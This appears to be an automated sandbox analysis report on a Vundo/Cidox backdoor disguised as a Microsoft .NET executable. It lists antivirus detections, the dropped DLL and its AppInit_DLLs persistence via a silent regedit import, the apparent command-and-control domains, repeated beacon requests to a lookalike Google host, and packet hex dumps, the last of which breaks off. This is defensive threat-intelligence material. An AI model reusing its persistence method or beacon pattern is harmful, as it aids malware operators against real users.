Analysis Date2014-11-30 18:09:44
MD5c6992e84d0bf7f790628327e6413e462
SHA1b5a7d2a03641ee64af9061880ef27aee446c187b

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: adf32ccf9922242eaee61c738cd1ae66 sha1: 7d47dc758465eb7516c09359e9eac2f5055a414c size: 27136
Section.rdata md5: 7a5c509b614766e6ef18351017ab61f7 sha1: 4529a0aec47bb99e3ea92834146f2b2735a7a5ba size: 7680
Section.data md5: 31789e4f2ccb9bcd6f2b7bf0a1298b49 sha1: 9d1ca1112c71e51599d1293b7d9f4beea028e12a size: 5120
Section.rsrc md5: 28cbcac1d6eb588a7e4d1081d7ce040f sha1: 17aa345e6b2273527b00d6d276f4355fce4ea93a size: 139776
Timestamp2012-12-18 17:04:04
VersionLegalCopyright: © Microsoft Corporation. All rights reserved.
InternalName: NETFXSBS10.exe
FileVersion: 2.0.50727.42 (RTM.050727-4200)
CompanyName: Microsoft Corporation
Comments: Flavor=Retail
ProductName: Microsoft® .NET Framework
ProductVersion: 2.0.50727.42
FileDescription: Microsoft .NET viewer
OriginalFilename: NETFXSBS10.exe
PackerMicrosoft Visual C++ ?.?
PEhash2ddf6ac218174d913b020c5b622ad80fcc481af7
IMPhashecace9b6a70583493455288bf01f7bbc
AV360 SafeGen:Variant.Symmi.8415
AVAd-AwareGen:Variant.Symmi.8415
AVAlwil (avast)Crypt-OQY [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Cidox.A.gen!Eldorado
AVAvira (antivir)TR/Drop.Vundo.voua
AVBullGuardGen:Variant.Symmi.8415
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)Trojan.Vundo.Gen
AVClamAVWIN.Trojan.Cidox-1024
AVDr. WebTrojan.Inject1.15498
AVEmsisoftGen:Variant.Symmi.8415
AVEset (nod32)Win32/Kryptik.AQUP
AVFortinetW32/Kryptik.FAGX!tr
AVFrisk (f-prot)W32/Cidox.A.gen!Eldorado
AVF-SecureGen:Variant.Symmi.8415
AVGrisoft (avg)Generic_r.BZR
AVIkarusBackdoor.Win32.Cidox
AVK7Backdoor ( 04c547291 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesBackdoor.Cidox.WMP
AVMcafeeVundo-FAGX!C6992E84D0BF
AVMicrosoft Security EssentialsTrojanDropper:Win32/Vundo.V
AVMicroWorld (escan)Gen:Variant.Symmi.8415
AVRisingno_virus
AVSophosno_virus
AVSymantecBackdoor.Trojan
AVTrend Microno_virus
AVVirusBlokAda (vba32)Malware-Cryptor.SB

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

RegistryHKEY_CURRENT_USER\SessionInformation\ProgramCount ➝
NULL
Creates FileC:\WINDOWS\system32\zylkmei.dll
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Cookies\cf
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates ProcessC:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNSdetoxist.com
Winsock DNSclickbeta.ru
Winsock DNS91.220.35.154
Winsock DNSveroconma.com
Winsock DNSterrans.su
Winsock DNSgetinball.com
Winsock DNSgeostepster.com
Winsock DNStheloamva.com
Winsock DNStryatdns.com
Winsock DNSclickclans.ru
Winsock DNSdentagod.com
Winsock DNSdenareclick.com
Winsock DNSdebijonda.com
Winsock DNSfescheck.com
Winsock DNSliteworns.com
Winsock DNSgetintsu.com
Winsock DNSnshouse1.com
Winsock DNSnetrovad.com
Winsock DNSvengibit.com
Winsock DNStryangets.com
Winsock DNSvornedix.com
Winsock DNSinzavora.com
Winsock DNSgetavodes.com
Winsock DNSdegoog1etag.com
Winsock DNSclickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝
C:\WINDOWS\system32\zylkmei.dll\\x00

Network Details:

DNSgeostepster.com
Type: A
208.73.211.250
DNSgeostepster.com
Type: A
208.73.210.211
DNSgeostepster.com
Type: A
208.73.211.167
DNSgeostepster.com
Type: A
208.73.211.244
DNSdetoxist.com
Type: A
141.8.225.80
DNSdebijonda.com
Type: A
141.8.225.80
DNSveroconma.com
Type: A
74.117.179.241
DNStheloamva.com
Type: A
141.8.225.80
DNSvornedix.com
Type: A
141.8.225.80
DNSdentagod.com
Type: A
141.8.225.80
DNSliteworns.com
Type: A
141.8.225.80
DNSvengibit.com
Type: A
141.8.225.80
DNStryangets.com
Type: A
141.8.225.80
DNSgetintsu.com
Type: A
141.8.225.80
DNSgetavodes.com
Type: A
209.222.14.3
DNStryatdns.com
Type: A
209.222.14.3
DNSfescheck.com
Type: A
109.234.109.76
DNSinzavora.com
Type: A
141.8.225.80
DNSdegoog1etag.com
Type: A
DNSgetinball.com
Type: A
DNSnetrovad.com
Type: A
DNSterrans.su
Type: A
DNSclickstano.com
Type: A
DNSdenareclick.com
Type: A
DNSclickbeta.ru
Type: A
DNSnshouse1.com
Type: A
DNSclickclans.ru
Type: A
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjk+hScGIDlQq
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjk+hScGIDlQq
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjlDKDsPoCXEh
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjsKvrSP7OO9B
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjsKvrSP7OO9B
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjoSpXNvS7oGU
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjoSpXNvS7oGU
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjkdS0ll7hOJd
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjsBu5j+Qdpcj
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjsBu5j+Qdpcj
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjsBu5j+Qdpcj
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjju/fGzdThMI
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjk+SZNMtIOIh
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjjAwdG2uTUow
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjsBu5j+Qdpcj
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjuFHVQoCdBuf
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 208.73.211.250:80
Flows TCP192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 74.117.179.241:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1038 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1039 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1040 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1041 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1042 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1043 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1044 ➝ 109.234.109.76:80
Flows TCP192.168.1.1:1045 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1046 ➝ 91.220.35.154:80

Raw Pcap
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a6b 2b685363 4749446c 51712048   abjk+hScGIDlQq H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a6b 2b685363 4749446c 51712048   abjk+hScGIDlQq H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a6c 444b4473 506f4358 45682048   abjlDKDsPoCXEh H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a73 4b767253 50374f4f 39422048   abjsKvrSP7OO9B H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a73 4b767253 50374f4f 39422048   abjsKvrSP7OO9B H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a6f 5370584e 7653376f 47552048   abjoSpXNvS7oGU H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a6f 5370584e 7653376f 47552048   abjoSpXNvS7oGU H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a6b 6453306c 6c37684f 4a642048   abjkdS0ll7hOJd H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a73 4275356a 2b516470 636a2048   abjsBu5j+Qdpcj H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a73 4275356a 2b516470 636a2048   abjsBu5j+Qdpcj H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a73 4275356a 2b516470 636a2048   abjsBu5j+Qdpcj H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
